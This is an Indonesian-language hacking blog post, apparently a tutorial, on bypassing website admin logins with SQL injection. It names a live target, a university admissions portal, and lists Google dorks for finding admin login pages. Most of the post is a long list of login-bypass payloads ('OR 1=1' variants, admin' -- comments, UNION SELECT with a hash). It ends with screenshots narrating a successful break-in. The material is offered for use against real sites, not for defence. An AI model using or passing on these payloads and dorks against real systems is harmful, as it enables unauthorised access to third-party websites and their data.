Harusnya mudah2 saja rek,
kuncinya Harus SABAR ..
Banyak loh yang ngomong, jadi HACKER itu tidak instan kayak mie instant
, butuh kesabaran , blablabla.. ( males bacot )
langsung aja yo...
LIVE TARGET : http://pmdk.polban.ac.id/userSekolah/
DORK :
login | logon
inurl:"/admin/ site:
inurl:"/admin/ intext:"login" site:
inurl:"/admin/login.php site:
inurl:"/admin/login.php intext:"login" site:
intitle:"admin login" site:
dan msh banyak lagi...
Dan Ini Untuk Bypassnya :D
' OR 1=1 --
' OR 1=1
' OR '1'='1'
' OR 'a' = 'a
' or 0=0 #
' or 'x'='x
' or a=a--
'or'1=1'
' or 0=0 --
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
') or ('a'='a
' or 1=1--
' or 'x'='x
' or 0=0 #
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
==
and 1=1--
and 1=1
1') and '1'='1--
admin' --
admin' #
admin'/*
) or '1'='1--
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
" or 1=1--
" or 0=0 #
") or ("a"="a
" OR 1=1
" OR "1"="1
1' OR 1=1
1' OR '1'='1'
or 1=1
or 1=1--
or 1=1#
or 1=1/*
or 0=0 #
or 0=0 --
or 0=0 #
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
//Selesai..
//>
<//
//>
<//
//>
<//
//>
<//
//>
<//
//>
<//
//>
<//
//>
<//
===========================
ATTENTION:
Ini hanya trik ,
Misalnya, ada yg punya kasus kyk gini :
Gambar 1 :
kita mencoba injek form login dgn query seperti dibawah ini..
![[Image: Screenshot_2.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tNpAi5JzFEQwgcH9-pZK0VyY7dwZE6hlJPabRrlVqFFX4jDsc0_UuO36HglTUaMRHVyMqMNcfvw3jS_Gl28WxfdbwU0s8y9BB8a_fPQXT3e5VnwOFUdmYC_D0=s0-d)
Gambar 2 :
dan hasil menunjukkan Database Error ,
![[Image: Screenshot_3.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vUKqG1g0amjdOTG4gv-6Qw26iGtE5yPFQLYfAG8J8CaT0hC-wH2WzD8nI6x7B6fzGicrsTD-QmLc6AE4iKcG_2Klmq6CKyQ6dD5nIhuF9z2LFrogmt0VmFLVA=s0-d)
Kenapa bisa begitu?
Itu karena query yg saya masukkan (pada Gambar 1) tidak sama dgn kodingan form login tsb..
Jngan sedih dulu ya mblo,, cewe msh banyak ko' ,
mau yg mana ?
yg ini ..
Hahahaha,,
Back to topic..
Dgn error kyk gitu, itu menunjukkan bhwa Web tsb Vuln SQL injection bypass
Gambar 3 :
Jalan satu2 nya, adalah mengganti query injeksi nya, #Ojok nyerah lek totok kene
hehehe...![[Image: Screenshot_4.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sReoM6nlLl0MHI_fxHEVK9Mc70nGrjDMYU4YNyc9K_fpM_6XmAIGI3t-XZeHbFz3RLJXOiEPCZ6nGrUdAJXejsPDgz-3fwU3KvAZTLDZ8wulHLosJ5h3Ux4M4=s0-d)
Jebret...
Gambar 4 :
![[Image: Screenshot_5.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_u4SOyb5b-5Ckq6MH2QB9uxh34BxYEIZHq-wKfKlO5boUwpNMdngtQOGGIgyqU_j57lFU3JXuFWIyD0Ua4_OOGuzWxO2EsqaDXTa-8uB9QsdiDZFRXXqMuXeGg=s0-d)
GOAL!!